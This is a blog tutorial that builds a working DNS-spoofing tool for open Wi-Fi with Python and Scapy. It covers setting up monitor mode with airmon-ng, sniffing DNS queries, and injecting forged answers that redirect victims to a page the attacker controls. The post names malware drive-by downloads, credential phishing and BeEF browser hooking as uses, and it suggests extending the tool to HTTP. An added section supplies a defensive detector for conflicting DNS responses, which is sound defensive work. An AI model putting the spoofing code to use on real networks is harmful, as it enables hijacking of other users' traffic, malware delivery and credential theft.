Wireless Attacks With Python: Part One – the “Dnspwn Attack”

By | July 13, 2018

Introduction

A while back, I published a post on the Raidersec blog demonstrating how to perform a deauthentication attack using Python and Scapy. I enjoyed writing the post, since I got the opportunity to learn in-depth about how different wireless attacks work, beyond just learning how to exclusively use the aircrack suite.

So, with that being said, this post will kick off a short series of posts discussing how to perform common wireless attacks using Python. I hope you enjoy the posts and, as always, never hesitate to let me know if you have any comments or questions below.


The “Dnspwn Attack”

The first attack we’ll explore is what I call the “dnspwn attack” (since, from what I can tell, this attack was first created targeting HTTP with the “airpwn” tool, and later extended to DNS). The idea behind the attack is pretty simple:

Consider two people on the same open WLAN: Bob and Eve. Eve wants to get Bob to visit a malicious webpage she created so that she can install malware onto Bob’s computer via a drive-by download, or perhaps show a spoofed website to try and steal Bob’s credentials.


To do this, she remembers that she can sniff all requests coming to and from Bob’s computer. She also knows that she is closer to Bob than the web server he is sending a request to. So, she decides to wait until Bob sends a web request, and see if she can send back a spoofed response pretending to come from the web server before the actual web server can respond. Turns out, she can. In fact, once the spoofed response is received, Bob’s computer will likely ignore any further traffic received, including the real response!

Let’s see what this would look like:

So, now that we know how the attack works, let’s automate it!


Setting up the Alfa AWUS06H

As was the case in my Raidersec post, we will be using the handy Alfa AWUS036H for this attack. The first thing we want to do is to put our wireless card in monitor mode so that we can capture all traffic coming from the demo_insecure network.

root@bt:~# airmon-ng start wlan0

Now that we have monitor mode up and running on mon0, let’s start coding!


Coding the Attack

We will utilize the scapy module to perform the attack. Let’s start by sniffing any UDP packet with a destination of port 53, and send the packet to a function called send_response that we will make later:

from scapy.all import *

# Hand every sniffed DNS query (UDP, destination port 53) to send_response, defined below
sniff(prn=lambda x: send_response(x),
  lfilter=lambda x: x.haslayer(UDP) and x.dport == 53)

Now let’s create a function which can parse the request for relevant information, and inject the response. We can parse the packet and create our response simply by working our way up the layers as follows:

  • 802.11 Frame – Change the “to-ds” flag to “from-ds” (our request will now be coming from the access point)
  • 802.11 Frame – Switch the source and destination MAC addresses
  • IP Layer – Switch the source and destination IP addresses
  • UDP layer – Switch the source and destination ports
  • DNS layer – Set the “answer” flag(s), and append our spoofed answer


Fortunately, scapy makes this very simple for us by abstracting away a lot of minor details (e.g. there are in fact 4 MAC address fields in an 802.11 frame, each in a different order depending on the direction of the packet). With that being said, here’s the code:

def send_response(x):
  # Get the requested domain
  req_domain = x[DNS].qd.qname
  spoofed_ip = '192.168.2.1'
  # Let's build our response from a copy of the original packet
  response = x.copy()
  # We need to start by changing our response to be "from-ds", or from the access point.
  # (FCfield bit 1 is from-DS; the original Python 2 code wrote this as 2L)
  response.FCfield = 2
  # Switch the MAC addresses
  response.addr1, response.addr2 = x.addr2, x.addr1
  # Switch the IP addresses
  response.src, response.dst = x.dst, x.src
  # Switch the ports
  response.sport, response.dport = x.dport, x.sport
  # Set the DNS flags: qr marks a response, ra advertises recursion available
  response[DNS].qr = 1
  response[DNS].ra = 1
  response[DNS].ancount = 1

Now that we’ve set all the flags, let’s create and append the DNS answer:

response[DNS].an = DNSRR(
  rrname = req_domain,
  type = 'A',
  rclass = 'IN',
  ttl = 900,
  rdata = spoofed_ip
  )

And, finally, we inject the spoofed response:

sendp(response)

That’s all there is to it! You can find the full source on Github.
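The race the attack relies on (the spoofed answer beats the real one, and the client's stack discards whatever arrives second) leaves an unmistakable trace on the wire: two DNS responses for the same transaction ID and name that disagree. The following detector is an added example and not part of the original post or its Github source; it parses DNS response payloads in pure Python and flags that condition. The functions (read_name, a_records, detect_conflicts, build_response) and the SAMPLE packets are constructed here, and the 10.0.0.5 client and 203.0.113.x addresses are placeholders.

```python
import struct

def read_name(msg, off):
    """Decode labels at msg[off:] until the terminator or a compression pointer; returns (name, next_offset)."""
    labels = []
    while msg[off] and msg[off] & 0xC0 != 0xC0:
        labels.append(msg[off + 1:off + 1 + msg[off]].decode('ascii'))
        off += 1 + msg[off]
    return '.'.join(labels), off + (2 if msg[off] else 1)   # pointer is 2 bytes, terminator is 1

def a_records(msg):
    """Return (txid, qname, frozenset of A rdata) for a DNS response; None if the QR bit marks a query."""
    txid, flags, _qd, an = struct.unpack('!HHHH', msg[:8])
    if not flags & 0x8000:
        return None
    qname, off = read_name(msg, 12)
    off, ips = off + 4, set()                                   # skip qtype and qclass
    for _ in range(an):
        _, off = read_name(msg, off)                            # answer name is usually just a pointer
        rtype, _cls, _ttl, rdlen = struct.unpack('!HHIH', msg[off:off + 10])
        if rtype == 1 and rdlen == 4:                           # A record carrying an IPv4 address
            ips.add('.'.join(map(str, msg[off + 10:off + 14])))
        off += 10 + rdlen
    return txid, qname, frozenset(ips)

def detect_conflicts(responses):
    """responses: iterable of (client_ip, dns_payload); returns an alert per later response whose A records differ."""
    first, alerts = {}, []
    for client, msg in responses:
        parsed = a_records(msg)
        if parsed is None:
            continue
        txid, qname, ips = parsed
        key = (client, txid, qname)
        if first.setdefault(key, ips) != ips:
            alerts.append(f'{client}: conflicting answers for {qname} (id {txid:#06x}): {sorted(first[key])} vs {sorted(ips)}')
    return alerts

def build_response(txid, qname, ip, ttl=300):
    """Minimal A response in wire format (constructed test data, not captured traffic)."""
    name = b''.join(bytes([len(l)]) + l.encode() for l in qname.split('.')) + b'\x00'
    header = struct.pack('!HHHHHH', txid, 0x8180, 1, 1, 0, 0)   # flags: QR=1, RD=1, RA=1
    rr = b'\xc0\x0c' + struct.pack('!HHIH', 1, 1, ttl, 4) + bytes(int(o) for o in ip.split('.'))
    return header + name + struct.pack('!HH', 1, 1) + rr

# Constructed capture: the injected answer (192.168.2.1, TTL 900 as in the post) beats the real one for 0x1a2b; 0x3c4d is a plain retransmit
SAMPLE = [('10.0.0.5', build_response(0x1a2b, 'example.com', '192.168.2.1', ttl=900)),
          ('10.0.0.5', build_response(0x1a2b, 'example.com', '203.0.113.10')),
          ('10.0.0.5', build_response(0x3c4d, 'example.org', '203.0.113.20')),
          ('10.0.0.5', build_response(0x3c4d, 'example.org', '203.0.113.20'))]
```

Feeding it the UDP payloads of port-53 responses seen in a capture yields one alert for the injected exchange and none for the ordinary retransmit; in practice the injected answer also tends to stand out by its short, fixed TTL.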


Demo

For the demo, I have the following HTML response available on the host 192.168.2.138:

<html>
<head></head>
<body>
  Owned.
</body>
</html>

It’s worth noticing that we can have any HTML, Javascript, etc. we want. It would be trivial to hook the browser using the BeEF framework, for example.

Here’s a screenshot of it in action (I am using my iPhone as the victim):


Conclusion & Future Improvements

It’s important to note that this attack will work just as well on other simple request/response protocols. For example, the original “airpwn” attack spoofed HTTP responses. There are also quite a few improvements we can make to this script. Here are a few:

  • Match requests against regular expressions (for example, only replacing Javascript content)
  • Set options from arguments / Read configuration information from a file
  • Implement the attack for other protocols (i.e. HTTP).

Enjoy!

Jordan

